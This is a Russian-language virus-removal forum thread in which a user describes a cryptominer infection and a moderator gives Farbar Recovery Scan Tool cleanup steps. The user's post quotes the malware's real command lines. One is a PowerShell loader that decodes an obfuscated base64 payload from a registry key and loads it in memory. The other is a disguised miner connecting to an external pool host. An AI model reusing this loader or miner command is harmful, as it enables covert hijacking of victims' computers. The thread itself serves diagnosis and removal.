Перейти к содержимому


Фотография
- - - - -

trojan.multi.genautorunproc.a

Друзья!

 В данном разделе форума действуют дополнительные правила — тема «Общие правила раздела "Уничтожение вирусов"». Пожалуйста, ознакомьтесь с ними перед размещением любого сообщения в данном разделе.

Для оформления запроса о помощи, внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи».


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 3

#1 OFF   GrindcoreLamer

GrindcoreLamer

    Новичок

  • Новички
  • Cообщений: 2

Отправлено 04 March 2020 - 23:07

Вчера вечером касперский начал ругаться на трояна. Поставил "лечить без перезагрузки" и забил. В итоге через полчаса у меня начал лагать рабочий стол. Открыл диспетчер задач и обнаружил, что у меня 6 гигов оперативы забиты тупа файлами блокнота.

Сегодня сидел, целый день вычищал. Ничего не вычистил, очевидно, иначе сюда бы я не писал.

Касперский после лечения с перезагрузкой находит вирус снова, блокноты продолжают спавниться, прошелся также за компанию AVZ, CureIT, malwarebytes, advcleaner, hitmanpro, kvrt и т.п., пробовал флешку касперского, не помогло.

Блокноты закрываются и не создаются, когда открываешь диспетчер задач. Диспетчер задач не закрывается сам по себе.

При мониторинге через anvir обнаружил, что блокнот запускается через такую цепочку (по логам):

- powershell.exe XXXX started by XXXX username

- notepad.exe XXXX started by powershell.exe username

Повторный перезапуск происходит каждые 3 минуты

Через детальную информацию в том же анвире

блокнот:

командная строка notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=6 -k --nicehash --donate-level=0 Командная строка
 
powershell:
командная строка "powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($ B);[GAS.Ad]::CU();Exit(0); Командная строка
 
Подобные посты вижу с 2018 года, но решения там не нашел) Простите :(

Прикрепленные файлы


Сообщение отредактировал GrindcoreLamer: 04 March 2020 - 23:10

  • 0

#2 OFF   thyrex

thyrex

    Абориген

  • Модераторы
  • Консультанты
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 15059

Награды

           

Отправлено 04 March 2020 - 23:36

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.
  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.
3munStB.png
3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
  • 0
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect



m4303.gif

#3 OFF   GrindcoreLamer

GrindcoreLamer

    Новичок

  • Новички
  • Cообщений: 2

Отправлено 04 March 2020 - 23:56

Сделано)

Прикрепленные файлы

  • Прикрепленный файл  Farbar.rar   25.26К   скачиваний 1

  • 0

#4 OFF   thyrex

thyrex

    Абориген

  • Модераторы
  • Консультанты
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 15059

Награды

           

Отправлено 05 March 2020 - 16:15

1. Выделите следующий код:
Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKU\S-1-5-19\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKU\S-1-5-20\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKU\S-1-5-21-219596756-659322394-4251240762-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
S2 AvgWscReporter; "C:\Program Files\AVG\Antivirus\wsc_proxy.exe" /runassvc /rpcserver [X]
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} =>  -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} =>  -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
Reboot:
End::
2. Скопируйте выделенный текст (правая кнопка мышиКопировать).
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
  • Обратите внимание: будет выполнена перезагрузка компьютера.

  • 0
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect



m4303.gif




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных